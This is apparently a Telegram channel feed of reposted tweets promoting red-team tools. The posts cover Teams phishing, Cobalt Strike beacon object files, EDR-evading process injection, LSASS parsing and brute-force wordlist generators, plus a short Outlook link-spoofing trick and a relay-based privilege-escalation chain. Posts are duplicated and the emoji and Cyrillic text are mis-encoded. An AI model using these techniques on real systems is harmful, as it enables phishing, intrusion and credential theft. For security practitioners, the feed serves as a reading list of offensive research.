๐ [ kleiton0x7e, Kleiton Kurti ]
Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.
Github:
#CyberSecurity #redteam #infosec #infosecurity
๐ https://github.com/WKL-Sec/wmiexec/
๐ฅ [ tweet ]
Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.
Github:
#CyberSecurity #redteam #infosec #infosecurity
๐ https://github.com/WKL-Sec/wmiexec/
๐ฅ [ tweet ]
๐ฅ3
๐ [ Octoberfest73, Octoberfest7 ]
Happy early 4th- TeamsPhisher is out now! Send messages + attachments to external Teams users for the purpose of phishing for access.
This short project was a fun departure from all of the BOF and Post-ex stuff I typically focus on.
#redteam #Malware
๐ https://github.com/Octoberfest7/TeamsPhisher
๐ฅ [ tweet ]
Happy early 4th- TeamsPhisher is out now! Send messages + attachments to external Teams users for the purpose of phishing for access.
This short project was a fun departure from all of the BOF and Post-ex stuff I typically focus on.
#redteam #Malware
๐ https://github.com/Octoberfest7/TeamsPhisher
๐ฅ [ tweet ]
๐ฅ3๐1
๐ [ SEKTOR7net, SEKTOR7 Institute ]
A guide to building your engagement infrastructure, by Andrรฉ Tschapeller (@hipstertrojan)
#redteam
๐ https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
๐ฅ [ tweet ]
A guide to building your engagement infrastructure, by Andrรฉ Tschapeller (@hipstertrojan)
#redteam
๐ https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
๐ฅ [ tweet ]
๐ฅ1
๐ [ r1cksec, r1cksec ]
New cheatsheets pushed ๐ต๏ธโโ๏ธ
๐ https://github.com/r1cksec/cheatsheets
Including:
A well written blog post on how to read and parse LSASS memory dumps with PowerShell ๐
#infosec #cybersecurity #pentesting #redteam #lsass #windows
๐ https://powerseb.github.io/posts/LSASS-parsing-without-a-cat
๐ฅ [ tweet ]
New cheatsheets pushed ๐ต๏ธโโ๏ธ
๐ https://github.com/r1cksec/cheatsheets
Including:
A well written blog post on how to read and parse LSASS memory dumps with PowerShell ๐
#infosec #cybersecurity #pentesting #redteam #lsass #windows
๐ https://powerseb.github.io/posts/LSASS-parsing-without-a-cat
๐ฅ [ tweet ]
๐4
Media is too big
VIEW IN TELEGRAM
๐ [ fortunato lodari @flodari ]
Are you tired of failing to create DNS Entry for DavRelay?
LPE with:
no AV/EDR detection, only SIEM (if) checks on LDAP changes
#redteam #LPE #DAVRelay #FUD
๐ฅ [ tweet ]
+ ะดะตะผะพ ะฝะฐ ะบะพะฑะต:
๐ https://threadreaderapp.com/thread/1697922181684936753.html
Are you tired of failing to create DNS Entry for DavRelay?
LPE with:
ssh -R +
addcomputer.py +
Proxychains +
Proxylite +
PetitPotam +
rbcd_relayno AV/EDR detection, only SIEM (if) checks on LDAP changes
#redteam #LPE #DAVRelay #FUD
๐ฅ [ tweet ]
+ ะดะตะผะพ ะฝะฐ ะบะพะฑะต:
๐ https://threadreaderapp.com/thread/1697922181684936753.html
๐ฅ10
๐ [ Louis Dion-Marcil @ldionmarcil ]
Outlook for Windows can be tricked into displaying a fake domain, but open another one. Add a <base> tag with a fake domain + left-to-right mark (U+200E)
Links in <a> tags will show the fake domain, but open the real domain.
No need to buy .zip! :) Convincing #phishing #redteam
๐ฅ [ tweet ]
Outlook for Windows can be tricked into displaying a fake domain, but open another one. Add a <base> tag with a fake domain + left-to-right mark (U+200E)
Links in <a> tags will show the fake domain, but open the real domain.
No need to buy .zip! :) Convincing #phishing #redteam
๐ฅ [ tweet ]
๐ฅ5๐1๐ฅฑ1
๐ [ HADESS @Hadess_security ]
The Art Of Hiding In Windows: techniques used by malicious actors to obscure their activities, making detection and analysis significantly more challenging for security professionals.
Article:
๐ https://hadess.io/the-art-of-hiding-in-windows/
EBook:
๐ https://hadess.io/the-art-of-hiding-in-windows-ebook/
#windows #redteam
๐ฅ [ tweet ]
The Art Of Hiding In Windows: techniques used by malicious actors to obscure their activities, making detection and analysis significantly more challenging for security professionals.
Article:
๐ https://hadess.io/the-art-of-hiding-in-windows/
EBook:
๐ https://hadess.io/the-art-of-hiding-in-windows-ebook/
#windows #redteam
๐ฅ [ tweet ]
(pdf-ะบะฐ ะฒ ะบะพะผะผะตะฝัะฐั
)๐2๐ฅ2
๐ [ Kleiton Kurti @kleiton0x7e ]
Spent some time reversing undocumented Syscalls residing in Kernel32/Ntdll and created a PoC for proxying DLL loads. This leads to a clean call stack as the return address pointing to shellcode won't be pushed to stack.
#CyberSecurity #redteam #infosec
๐ https://github.com/kleiton0x00/Proxy-DLL-Loads
๐ฅ [ tweet ]
Spent some time reversing undocumented Syscalls residing in Kernel32/Ntdll and created a PoC for proxying DLL loads. This leads to a clean call stack as the return address pointing to shellcode won't be pushed to stack.
#CyberSecurity #redteam #infosec
๐ https://github.com/kleiton0x00/Proxy-DLL-Loads
๐ฅ [ tweet ]
๐4๐ฅ1
๐ [ Panagiotis Chartas @t3l3machus ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) ๐ Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
๐ https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
๐ https://github.com/t3l3machus/psudohash
๐ฅ [ tweet ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data) ๐ Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
๐ https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
๐ https://github.com/t3l3machus/psudohash
๐ฅ [ tweet ]
๐ [ HackerRalf @hacker_ralf ]
Everyone takes a lot from the community... it's time to give something back yourself.
Kerbeus - BOF implementation of Rubeus (not all).
๐ https://github.com/RalfHacker/Kerbeus-BOF
P. S. PM me about all bugs
#redteam #kerberos #havoc #cobaltstrike #bof
๐ฅ [ tweet ]
Everyone takes a lot from the community... it's time to give something back yourself.
Kerbeus - BOF implementation of Rubeus (not all).
๐ https://github.com/RalfHacker/Kerbeus-BOF
P. S. PM me about all bugs
#redteam #kerberos #havoc #cobaltstrike #bof
๐ฅ [ tweet ]
๐10
๐ [ WHOAMI @wh0amitz ]
To audit the security of read-only domain controllers, I created the SharpRODC project, a simple .NET tool for RODC-related misconfigurations.
๐ https://github.com/wh0amitz/SharpRODC
#infosec #redteam #cybersecurity #pentesting
๐ฅ [ tweet ]
To audit the security of read-only domain controllers, I created the SharpRODC project, a simple .NET tool for RODC-related misconfigurations.
๐ https://github.com/wh0amitz/SharpRODC
#infosec #redteam #cybersecurity #pentesting
๐ฅ [ tweet ]
๐ฅ3
๐ [ Matt Eidelberg @Tyl0us ]
Long overdue but SourcePoint v3.0 is out now, with a ton of new features and bug fixes. With these changes, Initial access and Post-Ex activities with CobaltStrike can fly under the radar.
Check it out !
#redteam #netsec
๐ https://github.com/Tylous/SourcePoint/releases/tag/v3.0
๐ฅ [ tweet ]
Long overdue but SourcePoint v3.0 is out now, with a ton of new features and bug fixes. With these changes, Initial access and Post-Ex activities with CobaltStrike can fly under the radar.
Check it out !
#redteam #netsec
๐ https://github.com/Tylous/SourcePoint/releases/tag/v3.0
๐ฅ [ tweet ]
๐ฅ5
Offensive Xwitter
๐ [ SafeBreach @safebreach ] This is huge. As presented at #BlackHatEurope today, see how SafeBreach Labs researcher Alon Leviev developed a brand new set of highly flexible process injection techniques that are able to completely bypass leading EDR solutions.โฆ
๐ [ Shashwat Shah ๐ฎ๐ณ @0xEr3bus ]
Just crafted a beacon object file for the 8th variant of the powerful process injection technique by @_0xDeku. An exciting journey into the Windows Thread Pool!
#cybersecurity #redteam #infosec #cobaltstrike
๐ https://github.com/0xEr3bus/PoolPartyBof
๐ฅ [ tweet ]
Just crafted a beacon object file for the 8th variant of the powerful process injection technique by @_0xDeku. An exciting journey into the Windows Thread Pool!
#cybersecurity #redteam #infosec #cobaltstrike
๐ https://github.com/0xEr3bus/PoolPartyBof
๐ฅ [ tweet ]
๐2
๐ [ SchrodingersAV @SchrodingersAV ]
Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell script to edit scheduled tasks via the registry keys.
Can be used in memory with powershell!
#redteam #cybersecurity #hacking
๐ https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2
๐ฅ [ tweet ]
Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell script to edit scheduled tasks via the registry keys.
Can be used in memory with powershell!
#redteam #cybersecurity #hacking
๐ https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2
๐ฅ [ tweet ]
๐ฅ3๐1
Offensive Xwitter
๐ [ SchrodingersAV @SchrodingersAV ] Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell script to edit scheduled tasks via the registry keys. Can be used in memory with powershell! #redteam #cybersecurityโฆ
๐ [ David @dmcxblue ]
Managed to port to C# the Invoke-GhostTask from @SchrodingersAV, added a little bit more details on what is going on.
#redteam
๐ https://github.com/dmcxblue/SharpGhostTask
๐ฅ [ tweet ]
Managed to port to C# the Invoke-GhostTask from @SchrodingersAV, added a little bit more details on what is going on.
#redteam
๐ https://github.com/dmcxblue/SharpGhostTask
๐ฅ [ tweet ]
๐ฅ4๐2
๐ [ NCV @nickvourd ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
๐ https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
๐ฅ [ tweet ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
๐ https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
๐ฅ [ tweet ]
๐ฅ4
๐ [ NVISO @NVISOsecurity ]
We've expanded our #RedTeam arsenal with a new awesome Windows LPE BOF for #CobaltStrike and #BruteRatel thanks to the original exploit author @varwara.
Get your copy here!
๐ https://github.com/NVISOsecurity/CVE-2024-26229-BOF
๐ฅ [ tweet ]
We've expanded our #RedTeam arsenal with a new awesome Windows LPE BOF for #CobaltStrike and #BruteRatel thanks to the original exploit author @varwara.
Get your copy here!
๐ https://github.com/NVISOsecurity/CVE-2024-26229-BOF
๐ฅ [ tweet ]
๐ฅ4๐ฅฑ3
Offensive Xwitter
๐ [ LuemmelSec @theluemmel ] New blog by @itm4n is a must read for blue and red alike: ๐ https://itm4n.github.io/printnightmare-exploitation/ Quality stuff as always. Thanks I updated my Client-Checker to evaluate the affected reg keys so you can quicklyโฆ
๐ [ parzel @parzel2 ]
During a #redteam at @mod0 we discovered a limited but neat bypass for #printnightmare. I talked to @itm4n about it and he had an indepth look. Read about it here:
๐ https://itm4n.github.io/printnightmare-not-over/
๐ฅ [ tweet ]
During a #redteam at @mod0 we discovered a limited but neat bypass for #printnightmare. I talked to @itm4n about it and he had an indepth look. Read about it here:
๐ https://itm4n.github.io/printnightmare-not-over/
๐ฅ [ tweet ]
๐2
Forwarded from APT
๐ Exploring WinRM plugins for lateral movement
In this blog, the process of leveraging WinRM plugins to perform lateral movement to other systems is explored. Additionally, the use of the
๐ Research:
https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/
๐ Source:
https://github.com/FalconForceTeam/bof-winrm-plugin-jump
#ad #winrm #cobaltstrike #bof #redteam
In this blog, the process of leveraging WinRM plugins to perform lateral movement to other systems is explored. Additionally, the use of the
CIM_LogicFile WMI class to bypass certain tricky detections by Microsoft Defender is examined. Finally, all the logic is incorporated into a Cobalt Strike BOF.๐ Research:
https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/
๐ Source:
https://github.com/FalconForceTeam/bof-winrm-plugin-jump
#ad #winrm #cobaltstrike #bof #redteam
FalconForce
Exploring WinRM plugins for lateral movement - FalconForce
We explore how to leverage WinRM plugins to perform lateral movement to other systems and put all the logic in a Cobalt Strike BOF.
๐7๐ฅ2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
ะัะพััะฐั ัะตะฐะปะธะทะฐัะธั
https://gist.github.com/S3cur3Th1sSh1t/8294ec59d1ef38cba661697edcfacb9b
#soft #ad #pentest #redteam #dev
ts::multirdphttps://gist.github.com/S3cur3Th1sSh1t/8294ec59d1ef38cba661697edcfacb9b
#soft #ad #pentest #redteam #dev
๐6๐ฅฑ2